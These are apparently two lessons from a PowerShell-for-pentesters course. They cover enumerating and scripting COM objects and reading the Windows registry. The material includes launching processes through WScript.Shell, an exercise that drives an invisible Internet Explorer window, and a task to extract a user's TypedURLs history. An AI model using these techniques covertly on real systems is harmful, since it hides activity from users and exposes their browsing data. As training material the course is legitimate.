System.Runtime.InteropServices.OutAttribute System.Security.Cryptography.SHA1Managed SSR.SsrCore.1 MSDAURL.Binder.1 KmSvc.CKmsCertEnroll Shell.HWEventHandlerShellExecute.1 System.ThreadStaticAttribute PS C:\> ``` - Search for a particular ```COM``` object ```PowerShell PS C:\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | foreach {$_.GetValue("")} | Where-Object {$_ -match "wscript"} WScript.Network.1 WScript.Shell.1 WScript.Shell.1 WScript.Network.1 PS C:\> ``` ###### Creating and Using COM objects - ```WScript.Shell.1``` ```PowerShell PS C:\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | foreach {$_.GetValue("")} | Where-Object {$_ -match "wscript"} WScript.Network.1 WScript.Shell.1 WScript.Shell.1 WScript.Network.1 PS C:\> ``` ```PowerShell PS C:\> $wscript = New-Object -ComObject WScript.Shell.1 ``` ```PowerShell PS C:\> $wscript | Get-Member TypeName: System.__ComObject#{41904400-be18-11d3-a28b-00104bd35090} Name MemberType Definition ---- ---------- ---------- AppActivate Method bool AppActivate (Variant, Variant) CreateShortcut Method IDispatch CreateShortcut (string) Exec Method IWshExec Exec (string) ExpandEnvironmentStrings Method string ExpandEnvironmentStrings (string) LogEvent Method bool LogEvent (Variant, string, string) Popup Method int Popup (string, Variant, Variant, Variant) RegDelete Method void RegDelete (string) RegRead Method Variant RegRead (string) RegWrite Method void RegWrite (string, Variant, Variant) Run Method int Run (string, Variant, Variant) SendKeys Method void SendKeys (string, Variant) Environment ParameterizedProperty IWshEnvironment Environment (Variant) {get} CurrentDirectory Property string CurrentDirectory () {get} {set} SpecialFolders Property IWshCollection SpecialFolders () {get} PS C:\> ``` ```PowerShell PS C:\> $wscript.CurrentDirectory C:\Users\Administrator PS C:\> ``` ```PowerShell PS C:\> $wscript.Popup("PowerShell") 1 PS C:\> ``` ![Image of Popup](images/8.jpeg) ```PowerShell PS C:\> $wscript.SendKeys("PowerShell") PS C:\> PowerShell PS C:\> ``` ```PowerShell PS C:\> $wscript.Exec("cmd.exe") Status : 0 StdIn : System.__ComObject StdOut : System.__ComObject StdErr : System.__ComObject ProcessID : 3544 ExitCode : 0 PS C:\> ``` ```PowerShell PS C:\> $wscript.Exec("calc.exe") Status : 0 StdIn : System.__ComObject StdOut : System.__ComObject StdErr : System.__ComObject ProcessID : 3272 ExitCode : 0 PS C:\> ``` ![Image of Popup](images/9.jpeg) - ```Shell.Application.1``` ```PowerShell PS C:\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | foreach {$_.GetValue("")} | Where-Object {$_ -match "Shell.Application"} Shell.Application.1 PS C:\> ``` ```PowerShell PS C:\> $ShellApp = New-Object -ComObject Shell.Application.1 ``` ```PowerShell PS C:\> $ShellApp | Get-Member TypeName: System.__ComObject#{286e6f1b-7113-4355-9562-96b7e9d64c54} Name MemberType Definition ---- ---------- ---------- AddToRecent Method void AddToRecent (Variant, string) BrowseForFolder Method Folder BrowseForFolder (int, string, int, Variant) CanStartStopService Method Variant CanStartStopService (string) CascadeWindows Method void CascadeWindows () ControlPanelItem Method void ControlPanelItem (string) EjectPC Method void EjectPC () Explore Method void Explore (Variant) ExplorerPolicy Method Variant ExplorerPolicy (string) FileRun Method void FileRun () FindComputer Method void FindComputer () FindFiles Method void FindFiles () FindPrinter Method void FindPrinter (string, string, string) GetSetting Method bool GetSetting (int) GetSystemInformation Method Variant GetSystemInformation (string) Help Method void Help () IsRestricted Method int IsRestricted (string, string) IsServiceRunning Method Variant IsServiceRunning (string) MinimizeAll Method void MinimizeAll () NameSpace Method Folder NameSpace (Variant) Open Method void Open (Variant) RefreshMenu Method void RefreshMenu () SearchCommand Method void SearchCommand () ServiceStart Method Variant ServiceStart (string, Variant) ServiceStop Method Variant ServiceStop (string, Variant) SetTime Method void SetTime () ShellExecute Method void ShellExecute (string, Variant, Variant, Variant, Variant) ShowBrowserBar Method Variant ShowBrowserBar (string, Variant) ShutdownWindows Method void ShutdownWindows () Suspend Method void Suspend () TileHorizontally Method void TileHorizontally () TileVertically Method void TileVertically () ToggleDesktop Method void ToggleDesktop () TrayProperties Method void TrayProperties () UndoMinimizeALL Method void UndoMinimizeALL () Windows Method IDispatch Windows () WindowsSecurity Method void WindowsSecurity () WindowSwitcher Method void WindowSwitcher () Application Property IDispatch Application () {get} Parent Property IDispatch Parent () {get} PS C:\> ``` ```PowerShell PS C:\> $ShellApp.Parent Application Parent ----------- ------ System.__ComObject System.__ComObject PS C:\> ``` ```PowerShell PS C:\> $ShellApp.Application Application Parent ----------- ------ System.__ComObject System.__ComObject PS C:\> ``` ```PowerShell PS C:\> $ShellApp.MinimizeAll() ``` ```PowerShell PS C:\> $ShellApp.CascadeWindows() ``` ![Image of Cascade](images/10.jpeg) Run the Script ```Ie-Com.ps1``` ```PowerShell PS C:\> $ShellApp.Windows() Application : System.__ComObject Parent : System.__ComObject Container : Document : System.__ComObject TopLevelContainer : True Type : HTML Document Left : 36 Top : 36 Width : 900 Height : 600 LocationName : Google LocationURL : https://www.google.com/?gws_rd=ssl Busy : False Name : Internet Explorer HWND : 131558 FullName : C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE Path : C:\Program Files (x86)\Internet Explorer\ Visible : False StatusBar : False StatusText : ToolBar : 1 MenuBar : True FullScreen : False ReadyState : 4 Offline : False Silent : False RegisterAsBrowser : False RegisterAsDropTarget : True TheaterMode : False AddressBar : True Resizable : True PS C:\> ``` Stop the ```ie``` process using ```Task Manager``` ```PowerShell PS C:\> $ShellApp.Windows() ``` ```PowerShell PS C:\> $ShellApp.FileRun() ``` ![Image of Run](images/11.jpeg) ```PowerShell PS C:\> $ShellApp.BrowseForFolder(0,"Please select the folder --- ",1,"") Title : Videos Application : System.__ComObject Parent : ParentFolder : System.__ComObject Self : System.__ComObject OfflineStatus : HaveToShowWebViewBarricade : False ShowWebViewBarricade : False PS C:\> ``` ![Image of Run](images/12.jpeg) ```PowerShell PS C:\> $ShellApp.Explore(0) ``` ![Image of Run](images/13.jpeg) ```PowerShell PS C:\> $ShellApp.FindComputer() ``` ![Image of Run](images/14.jpeg) ###### Exercise - Use ```COM``` object for ```Internet Explorer``` to navigate to a website without ```visibility```. ```PowerShell PS C:\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | foreach {$_.GetValue("")} | Where-Object {$_ -match "internet"} InternetExplorer.Application.1 Internet.HHCtrl.1 Internet.HHCtrl.1 polmkr.apmGpeInternet.1 Internet.HHCtrl.1 InternetShortcut PS C:\> ``` ```PowerShell PS C:\> $ie_o = New-Object -ComObject InternetExplorer.Application.1 ``` ```PowerShell PS C:\> $ie_o | Get-Member TypeName: System.__ComObject#{d30c1661-cdaf-11d0-8a3e-00c04fc9e26e} Name MemberType Definition ---- ---------- ---------- ClientToWindow Method void ClientToWindow (int, int) ExecWB Method void ExecWB (OLECMDID, OLECMDEXECOPT, Variant, Variant) GetProperty Method Variant GetProperty (string) GoBack Method void GoBack () GoForward Method void GoForward () GoHome Method void GoHome () GoSearch Method void GoSearch () Navigate Method void Navigate (string, Variant, Variant, Variant, Variant) Navigate2 Method void Navigate2 (Variant, Variant, Variant, Variant, Variant) PutProperty Method void PutProperty (string, Variant) QueryStatusWB Method OLECMDF QueryStatusWB (OLECMDID) Quit Method void Quit () Refresh Method void Refresh () Refresh2 Method void Refresh2 (Variant) ShowBrowserBar Method void ShowBrowserBar (Variant, Variant, Variant) Stop Method void Stop () AddressBar Property bool AddressBar () {get} {set} Application Property IDispatch Application () {get} Busy Property bool Busy () {get} Container Property IDispatch Container () {get} Document Property IDispatch Document () {get} FullName Property string FullName () {get} FullScreen Property bool FullScreen () {get} {set} Height Property int Height () {get} {set} HWND Property int HWND () {get} Left Property int Left () {get} {set} LocationName Property string LocationName () {get} LocationURL Property string LocationURL () {get} MenuBar Property bool MenuBar () {get} {set} Name Property string Name () {get} Offline Property bool Offline () {get} {set} Parent Property IDispatch Parent () {get} Path Property string Path () {get} ReadyState Property tagREADYSTATE ReadyState () {get} RegisterAsBrowser Property bool RegisterAsBrowser () {get} {set} RegisterAsDropTarget Property bool RegisterAsDropTarget () {get} {set} Resizable Property bool Resizable () {get} {set} Silent Property bool Silent () {get} {set} StatusBar Property bool StatusBar () {get} {set} StatusText Property string StatusText () {get} {set} TheaterMode Property bool TheaterMode () {get} {set} ToolBar Property int ToolBar () {get} {set} Top Property int Top () {get} {set} TopLevelContainer Property bool TopLevelContainer () {get} Type Property string Type () {get} Visible Property bool Visible () {get} {set} Width Property int Width () {get} {set} PS C:\> ``` ```Ie-Com.ps1``` ```PowerShell $url = "http://www.google.com" $ie_o = New-Object -ComObject InternetExplorer.Application.1 $ie_o.visible = $False; $ie_o.navigate($url); ``` - Explore ```Shell.Application``` ```COM``` object and try some of the available methods. - [Look above](https://github.com/Kan1shka9/PowerShell-for-Pentesters/blob/master/35-COM-and-Powershell.md#creating-and-using-com-objects) ================================================ FILE: 36-Registry-and-Powershell-Part-1.md ================================================ #### 36. Registry and Powershell Part 1 ###### Reading Windows Registry - Registry Provider ```PowerShell PS C:\> Get-PSProvider -PSProvider Registry Name Capabilities Drives ---- ------------ ------ Registry ShouldProcess, Transactions {HKLM, HKCU} PS C:\> ``` - Reading Registry - ```Get-Item``` ```PowerShell PS C:\> Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT Name Property ---- -------- CurrentVersion SystemRoot : C:\Windows SoftwareType : System RegisteredOwner : Windows User InstallDate : 1499628648 CurrentVersion : 6.3 CurrentBuild : 9600 RegisteredOrganization : CurrentType : Multiprocessor Free InstallationType : Server EditionID : ServerStandardEval ProductName : Windows Server 2012 R2 Standard Evaluation ProductId : 00252-10000-00000-AA228 DigitalProductId : {164, 0, 0, 0...} DigitalProductId4 : {248, 4, 0, 0...} CurrentBuildNumber : 9600 BuildLab : 9600.winblue_ltsb.170613-0600 BuildLabEx : 9600.18730.amd64fre.winblue_ltsb.170613-0600 BuildGUID : ffffffff-ffff-ffff-ffff-ffffffffffff PathName : C:\Windows UBR : 18756 PS C:\> ``` - ```Get-ItemProperty``` ```PowerShell PS C:\> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' SystemRoot : C:\Windows SoftwareType : System RegisteredOwner : Windows User InstallDate : 1499628648 CurrentVersion : 6.3 CurrentBuild : 9600 RegisteredOrganization : CurrentType : Multiprocessor Free InstallationType : Server EditionID : ServerStandardEval ProductName : Windows Server 2012 R2 Standard Evaluation ProductId : 00252-10000-00000-AA228 DigitalProductId : {164, 0, 0, 0...} DigitalProductId4 : {248, 4, 0, 0...} CurrentBuildNumber : 9600 BuildLab : 9600.winblue_ltsb.170613-0600 BuildLabEx : 9600.18730.amd64fre.winblue_ltsb.170613-0600 BuildGUID : ffffffff-ffff-ffff-ffff-ffffffffffff PathName : C:\Windows UBR : 18756 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT PSChildName : CurrentVersion PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry PS C:\> ``` ```PowerShell PS C:\> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' | Format-List * SystemRoot : C:\Windows SoftwareType : System RegisteredOwner : Windows User InstallDate : 1499628648 CurrentVersion : 6.3 CurrentBuild : 9600 RegisteredOrganization : CurrentType : Multiprocessor Free InstallationType : Server EditionID : ServerStandardEval ProductName : Windows Server 2012 R2 Standard Evaluation ProductId : 00252-10000-00000-AA228 DigitalProductId : {164, 0, 0, 0...} DigitalProductId4 : {248, 4, 0, 0...} CurrentBuildNumber : 9600 BuildLab : 9600.winblue_ltsb.170613-0600 BuildLabEx : 9600.18730.amd64fre.winblue_ltsb.170613-0600 BuildGUID : ffffffff-ffff-ffff-ffff-ffffffffffff PathName : C:\Windows UBR : 18756 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT PSChildName : CurrentVersion PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry PS C:\> ``` - ```Get-ChildItem``` ```PowerShell PS C:\> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion Name Property ---- -------- Accessibility Active Directory AeDebug UserDebuggerHotKey : 0 AppCompatFlags MirrorCompatBinaryExtension : C:\Windows\System32\MirrorDrvCompat.dll AmiCacheVersion : 2 ASR OfflineDriverInjectionExtension : drvstore.dll,DriverStoreOfflineAddDriverPackageW Audit BackgroundModel Compatibility32 winword : 0x80000000 Console CorruptedFileRecovery TraceLevel : 0 RunCount : 0 DefaultProductKey ProductId : 00252-10000-00001-AA599 DigitalProductId : {164, 0, 0, 0...} DigitalProductId4 : {248, 4, 0, 0...} DeviceDisplayObjects DeviceStatusPropertyDescriptionList : prop:System.Devices.Status;System.PrintStatus.ErrorStatus;System.PrintStatus.WarningStatus;System.PrintStatus.DocumentCount;System.PrintStatus.InfoStatus;System.Pri ntStatus.Preferences;System.ScanStatus.Profile;System.PrintStatus.Location;System.PrintStatus.Comment;System.Devices.Connected DNS Server drivers.desc wdmaud.drv : Microsoft 1.1 UAA Function Driver for High Definition Audio Drivers32 vidc.yuy2 : msyuv.dll vidc.i420 : iyuv_32.dll msacm.msgsm610 : msgsm32.acm msacm.msg711 : msg711.acm vidc.yvyu : msyuv.dll vidc.yvu9 : tsbyuv.dll wavemapper : msacm32.drv midimapper : midimap.dll vidc.uyvy : msyuv.dll vidc.iyuv : iyuv_32.dll vidc.mrle : msrle32.dll msacm.imaadpcm : imaadp32.acm msacm.msadpcm : msadp32.acm vidc.msvc : msvidc32.dll wave : wdmaud.drv midi : wdmaud.drv mixer : wdmaud.drv aux : wdmaud.drv EFS Event Viewer MicrosoftRedirectionURL : http://go.microsoft.com/fwlink/events.asp MicrosoftRedirectionProgramCommandLineParameters : MicrosoftRedirectionProgram : Font Drivers Adobe Type Manager : atmfd.dll Font Management Auto Deactivation Exclude : {Calibri, Cambria, Consolas, Georgia...} Metadata : C:\Windows\Fonts\fms_metadata.xml FontDPI LogPixels : 96 FontLink FontLinkControl : 0 FontLinkDefaultChar : 12539 FontMapper @MS Mincho : 57472 @MS Gothic : 41088 @GulimChe : 41089 @Batang : 24705 @PMingLiU : 8328 MingLiU : 32904 MS Gothic : 32896 @BatangChe : 57473 @MS PGothic : 8320 @DotumChe : 45185 @MS PMincho : 24704 BatangChe : 49281 NSimSun : 32902 DotumChe : 36993 SMALL FONTS : 2048 SimSun : 134 @Gulim : 8321 MS SANS SERIF : 4096 FIXEDSYS : 36864 @Dotum : 12417 COURIER : 34816 PMingLiU : 136 @MingLiU : 41096 @SimSun : 8326 GulimChe : 32897 MS PGothic : 128 SYMBOL : 16386 @Gungsuh : 28801 ARIAL : 0 Dotum : 4225 Gungsuh : 20609 WINGDINGS : 2 GungsuhChe : 53377 Gulim : 129 MS PMincho : 16512 MS Mincho : 49280 MS SERIF : 20480 @NSimSun : 41094 COURIER NEW : 32768 @GungsuhChe : 61569 SYMBOL1 : 40962 TIMES NEW ROMAN : 16384 Batang : 16513 DEFAULT : 0 Fonts SimSun-ExtB (TrueType) : simsunb.ttf KodchiangUPC Bold (TrueType) : upckb.ttf Kokila Bold (TrueType) : kokilab.ttf Shonar Bangla (TrueType) : Shonar.ttf Mangal (TrueType) : mangal.ttf BrowalliaUPC Bold Italic (TrueType) : browauz.ttf Sakkal Majalla Bold (TrueType) : majallab.ttf LilyUPC Bold Italic (TrueType) : upclbi.ttf Palatino Linotype Bold (TrueType) : palab.ttf MoolBoran (TrueType) : moolbor.ttf Franklin Gothic Medium Italic (TrueType) : framdit.ttf Cordia New (TrueType) : cordia.ttf Arial Italic (TrueType) : ariali.ttf Kokila Italic (TrueType) : kokilai.ttf AngsanaUPC Italic (TrueType) : angsaui.ttf JasmineUPC (TrueType) : upcjl.ttf Trebuchet MS Bold (TrueType) : trebucbd.ttf Microsoft Tai Le (TrueType) : taile.ttf Utsaah (TrueType) : utsaah.ttf Malgun Gothic (TrueType) : malgun.ttf Simplified Arabic Fixed (TrueType) : simpfxo.ttf Gisha (TrueType) : gisha.ttf Utsaah Bold Italic(TrueType) : utsaahbi.ttf Microsoft JhengHei Light (TrueType) & Microsoft JhengHei UI Light (TrueType) : msjhl.ttc Comic Sans MS Bold (TrueType) : comicbd.ttf BrowalliaUPC (TrueType) : browau.ttf Segoe UI Symbol (TrueType) : seguisym.ttf Kokila (TrueType) : kokila.ttf Vrinda Bold (TrueType) : vrindab.ttf FreesiaUPC Bold Italic (TrueType) : upcfbi.ttf Traditional Arabic Bold (TrueType) : tradbdo.ttf Aparajita Bold (TrueType) : aparajb.ttf Sitka Bold Italic : SitkaZ.ttc Nirmala UI Semilight (TrueType) : NirmalaS.ttf Leelawadee UI Bold (TrueType) : leelauib.ttf KodchiangUPC Bold Italic (TrueType) : upckbi.ttf Gadugi Bold (TrueType) : gadugib.ttf Microsoft New Tai Lue (TrueType) : ntailu.ttf DokChampa (TrueType) : dokchamp.ttf Palatino Linotype Bold Italic (TrueType) : palabi.ttf Segoe UI Italic (TrueType) : segoeuii.ttf Calibri Bold (TrueType) : calibrib.ttf Cordia New Bold Italic (TrueType) : cordiaz.ttf Miriam (TrueType) : mriam.ttf Angsana New Bold (TrueType) : angsab.ttf Iskoola Pota (TrueType) : iskpota.ttf FreesiaUPC (TrueType) : upcfl.ttf Kartika (TrueType) : kartika.ttf Segoe UI Semilight (TrueType) : segoeuisl.ttf Vijaya (TrueType) : vijaya.ttf Nirmala UI (TrueType)... FontSubstitutes Arabic Transparent,0 : Arial,178 Arabic Transparent Bold,0 : Arial Bold,178 Arabic Transparent Bold : Arial Bold Rod Transparent : Rod Courier New CYR,204 : Courier New,204 Times New Roman CYR,204 : Times New Roman,204 Helvetica : Arial Arial CE,238 : Arial,238 MS Shell Dlg 2 : Tahoma David Transparent : David Courier New TUR,162 : Courier New,162 Times New Roman TUR,162 : Times New Roman,162 Times : Times New Roman Miriam Transparent : Miriam Times New Roman CE,238 : Times New Roman,238 Arial Greek,161 : Arial,161 KaiTi_GB2312 : KaiTi Courier New CE,238 : Courier New,238 Arial Baltic,186 : Arial,186 Tahoma Armenian : Tahoma FangSong_GB2312 : FangSong Arial TUR,162 : Arial,162 Tms Rmn : MS Serif Courier New Greek,161 : Courier New,161 Times New Roman Baltic,186 : Times New Roman,186 Arial CYR,204 : Arial,204 Arabic Transparent : Arial Helv : MS Sans Serif Courier New Baltic,186 : Courier New,186 Times New Roman Greek,161 : Times New Roman,161 Fixed Miriam Transparent : Miriam Fixed MS Shell Dlg : Microsoft Sans Serif GRE_Initialize DisableRemoteFontBootCache : 0 ServicingStackModifiedFonts : 2 ICM Image File Execution Options IniFileMapping InstalledFeatures KnownFunctionTableDlls C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordacwks.dll : 0 KnownManagedDebuggingDlls C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordacwks.dll : 0 C:\Windows\System32\mrt_map.dll : 0 LanguagePack OpenType : 0 MCI Extensions aiff : MPEGVideo dat : MPEGVideo m2t : MPEGVideo mpa : MPEGVideo wmx : MPEGVideo wmv : MPEGVideo Mid : Sequencer m3u : MPEGVideo avi : avivideo ivf : MPEGVideo wvx : MPEGVideo m4v : MPEGVideo mts : MPEGVideo mp4v : MPEGVideo mp2v : MPEGVideo adts : MPEGVideo wma : MPEGVideo mpeg : MPEGVideo tts : MPEGVideo mpv2 : MPEGVideo au : MPEGVideo 3gpp : MPEGVideo m4a : MPEGVideo wax : MPEGVideo aif : MPEGVideo asx : MPEGVideo m2ts : MPEGVideo mov : MPEGVideo Wav : WaveAudio aac : MPEGVideo wpl : MPEGVideo 3gp2 : MPEGVideo mp4 : MPEGVideo mp3 : MPEGVideo mp2 : MPEGVideo wm : MPEGVideo adt : MPEGVideo cda : CDAudio 3g2 : MPEGVideo asf : MPEGVideo mod : MPEGVideo m1v : MPEGVideo ts : MPEGVideo rmi : Sequencer mpg : MPEGVideo 3gp : MPEGVideo aifc : MPEGVideo mpe : MPEGVideo m2v : MPEGVideo snd : MPEGVideo MCI32 AVIVideo : mciavi32.dll Sequencer : mciseq.dll CDAudio : mcicda.dll WaveAudio : mciwave.dll MPEGVideo : mciqtz32.dll MiniDumpAuxiliaryDlls C:\Windows\system32\jscript9.dll : C:\Windows\System32\jscript9diag.dll C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll : C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscordacwks.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll : C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordacwks.dll C:\Windows\system32\mrt100.dll : C:\Windows\System32\mrt_map.dll MsiCorruptedFileRecovery Multimedia NetworkCards NetworkList (default) : 192.228.79.201 RootDnsIpv6Addr : 2001:478:65::53 FirstNetwork : 0 NoImeModeImes Notifications NtVdm64 OpenGLDrivers PeerDist Perflib Version : 65537 Last Help : 8909 Last Counter : 8908 Base Index : 1847 ExtCounterTestLevel : 4 Ports LPT1: : COM3: : 9600,n,8,1 LPT2: : COM4: : 9600,n,8,1 LPT3: : PORTPROMPT: : FILE: : COM1: : 9600,n,8,1 COM2: : 9600,n,8,1 Ne00: : Print DoNotInstallCompatibleDriverFromWindowsUpdate : 1 ProfileGuid ProfileList Default : C:\Users\Default ProfilesDirectory : C:\Users ProgramData : C:\ProgramData Public : C:\Users\Public ProfileLoader ProfileNotification Load : * Migrate : * Delete : * Upgrade : * Unload : * Create : * related.desc wave : RemoteRegistry DisableIdleStop : 0 Schedule DomainJoinDetected : 1 MigrationCleanupCompleted : 1 MTRCompleted : 1 HashingCompleted : 1 SCW (default) : C:\Windows\System32\scw.exe Path : C:\Windows\security\msscw\ SecEdit SetupCompDebugLevel : 1 EnvironmentVariables : {%AppData%, %UserProfile%, %AllUsersProfile%, %ProgramFiles%...} DefaultTemplate : C:\Windows\Inf\secrecs.inf LastUsedDatabase : C:\WINDOWS\Security\Database\secedit.sdb TemplateUsed : C:\Windows\inf\defltdc.inf LastWinLogonConfig : 1184467804 Sensor Server setup SoftwareProtectionPlatform VLRenewalInterval : 10080 UserOperations : 0 SkipRearm : 0 VLActivationInterval : 120 KeepRunningThresholdMins : 15 TokenStore : %WINDIR%\System32\spp\store\2.0 InactivityShutdownDelay : 30 CacheStore : %WINDIR%\System32\spp\store\2.0\cache ServiceSessionId : {34, 57, 148, 180...} LicStatusArray : {19, 111, 103, 229...} PolicyValuesArray : {52, 39, 201, 85...} actionlist : {139, 59, 15, 219...} HasOOBERun : 1 WSServiceTlrTrigger : 1 Superfetch Svchost RPCSS : {RpcEptMapper, RpcSs} LocalService : {nsi, WdiServiceHost, w32time, EventSystem...} WepHostSvcGroup : {WepHostSvc} defragsvc : {defragsvc} KpsSvcGroup : {kpssvc} DcomLaunch : {Power, LSM, BrokerInfrastructure, PlugPlay...} LocalSystemNetworkRestricted : {WdiSystemHost, ScDeviceEnum, trkwks, AudioEndpointBuilder...} netsvcs : {AeLookupSvc, CertPropSvc, SCPolicySvc, lanmanserver...} WerSvcGroup : {wersvc} LocalServiceNoNetwork : {DPS, PLA, BFE, mpssvc} termsvcs : {TermService} swprv : {swprv} wsappx : {WSService, AppXSvc} ICService : {vmicheartbeat, vmicrdv} smphost : {smphost} LocalServiceNetworkRestricted : {DHCP, eventlog, AudioSrv, LmHosts...} LocalServicePeerNet : {PNRPSvc, p2pimsvc, p2psvc, PnrpAutoReg} NetworkServiceAndNoImpersonation : {KtmRm} regsvc : {RemoteRegistry} wcssvc : {WcsPlugInService} TapiSrv : {TapiSrv} LocalServiceAndNoImpersonation : {SSDPSRV, upnphost, SCardSvr, BthHFSrv...} NetworkServiceNetworkRestricted : {PolicyAgent} AppReadiness : {AppReadiness} NetworkService : {CryptSvc, nlasvc, lanmanworkstation, NapAgent...} print : {PrintNotify} utcsvc : {DiagTrack} Terminal Server Time Zones TzVersion : 132187136 Tracing UnattendSettings Userinstallable.drivers wave : wdmaud.drv WbemPerf Windows (default) : mnmsrvc Spooler : yes DeviceNotSelectedTimeout : 15 TransmissionRetryTimeout : 90 EnableDwmInputProcessing : 7 ShutdownWarningDialogTimeout : 4294967295 USERProcessHandleQuota : 10000 LoadAppInit_DLLs : 0 IconServiceLib : IconCodecService.dll DesktopHeapLogging : 1 DdeSendTimeout : 0 DwmInputUsesIoCompletionPort : 1 USERPostMessageLimit : 10000 USERNestedWindowLimit : 50 AppInit_DLLs : NaturalInputHandler : Ninput.dll ThreadUnresponsiveLogTimeout : 500 GDIProcessHandleQuota : 10000 RequireSignedAppInit_DLLs : 1 Win32kLastWriteTime : 1D2EB62FDEA7E06 WindowsServerBackup Winlogon Userinit : C:\Windows\system32\userinit.exe, LegalNoticeText : Shell : explorer.exe LegalNoticeCaption : DebugServerCommand : no ForceUnlockLogon : 0 ReportBootOk : 1 VMApplet : SystemPropertiesPerformance.exe /pagefile AutoRestartShell : 1 PowerdownAfterShutdown : 0 ShutdownWithoutLogon : 0 Background : 0 0 0 PreloadFontFile : SC-Load.All PasswordExpiryWarning : 5 CachedLogonsCount : 10 WinStationsDisabled : 0 PreCreateKnownFolders : {A520A1A4-1780-4FF6-BD18-167343C5AF16} DisableCAD : 1 scremoveoption : 0 ShutdownFlags : 2147483751 AutoLogonSID : S-1-5-32 LastUsedUsername : DisableLockWorkstation : 0 DefaultDomainName : PFPT WSService WUDF DefaultHostProcessGUID : {193a1820-d9ac-4997-8c55-be817523f6aa} Logkd : 0 LogFlushPeriodSeconds : 300 LogEnable : 0 LogMinidumpType : 4384 HostFailKdDebugBreak : 1 LogFlags : 16777215 LogLevel : 3 NumDeviceStacksMax : 3 PS C:\> ``` ```PowerShell PS C:\> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Recurse ``` ###### Accessing all Registry hives - ```Method 1``` ```PowerShell PS C:\> Set-Location Registry:: ``` ```PowerShell PS Microsoft.PowerShell.Core\Registry::> ls Hive: Name Property ---- -------- HKEY_LOCAL_MACHINE HKEY_CURRENT_USER HKEY_CLASSES_ROOT HKEY_CURRENT_CONFIG HKEY_USERS HKEY_PERFORMANCE_DATA Global : {80, 0, 69, 0...} Costly : {80, 0, 69, 0...} PS Microsoft.PowerShell.Core\Registry::> ``` ```PowerShell PS Microsoft.PowerShell.Core\Registry::> cd HKEY_CLASSES_ROOT ``` ```PowerShell PS Microsoft.PowerShell.Core\Registry::HKEY_CLASSES_ROOT> ``` - ```Method 2``` ```PowerShell PS C:\> New-PSDrive -name RegistryDrive -PSProvider Registry -Root Registry::HKEY_CLASSES_ROOT Name Used (GB) Free (GB) Provider Root CurrentLocation ---- --------- --------- -------- ---- --------------- Registr... Registry HKEY_CLASSES_ROOT PS C:\> ``` ```PowerShell PS C:\> cd RegistryDrive: ``` ```PowerShell PS RegistryDrive:\> ls Hive: HKEY_CLASSES_ROOT Name Property ---- -------- * ContentViewModeForBrowse : prop:~System.ItemNameDisplay;System.ItemTypeText;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;System.DateModified;System.Size ContentViewModeLayoutPatternForBrowse : delta SetDefaultsFor : prop:System.Author;System.Document.DateCreated InfoTip : prop:System.ItemTypeText;System.Size;System.DateModified ContentViewModeForSearch : prop:~System.ItemNameDisplay;~System.ItemFolderPathDisplay;~System.LayoutPattern.PlaceHolder;System.ItemTypeText;System.DateModified;System.Size ContentViewModeLayoutPatternForSearch : delta ConflictPrompt : prop:System.ItemTypeText;System.Size;System.DateModified;System.DateCreated AlwaysShowExt : ExtendedTileInfo : prop:System.ItemTypeText;System.Size;System.DateModified;System.OfflineAvailability FullDetails : prop:System.PropGroup.FileSystem;System.ItemNameDisplay;System.ItemTypeText;System.ItemFolderPathDisplay;System.Size;System.DateCreated;System.DateModified;System .FileAttributes;*System.OfflineAvailability;*System.OfflineStatus;*System.SharedWith;*System.FileOwner;*System.ComputerName PreviewTitle : prop:System.ItemNameDisplay;System.ItemTypeText QuickTip : prop:System.ItemTypeText;System.Size;System.DateModified NoStaticDefaultVerb : PreviewDetails : prop:System.DateModified;System.Size;System.DateCreated;*System.OfflineAvailability;*System.OfflineStatus;*System.SharedWith NoRecentDocs : TileInfo : prop:System.ItemTypeText;System.Size;System.DateModified .386 (default) : vxdfile PerceivedType : system .a .accountpicture-ms (default) : accountpicturefile Content Type : application/windows-accountpicture .ai Content Type : application/postscript .aif PerceivedType : audio ``` ```PowerShell PS RegistryDrive:\> Get-PSDrive Name Used (GB) Free (GB) Provider Root CurrentLocation ---- --------- --------- -------- ---- --------------- Alias Alias C 17.41 14.25 FileSystem C:\ Cert Certificate \ D .06 FileSystem D:\ Env Environment Function Function HKCU Registry HKEY_CURRENT_USER HKLM Registry HKEY_LOCAL_MACHINE Registr... Registry HKEY_CLASSES_ROOT Variable Variable WSMan WSMan PS RegistryDrive:\> ``` ###### Exercise - Get a list of [```TypedURLs```](http://www.wikihow.com/Clear-Internet-Explorer%27s-URL-History-by-Editing-the-Registry) from Windows Registry. 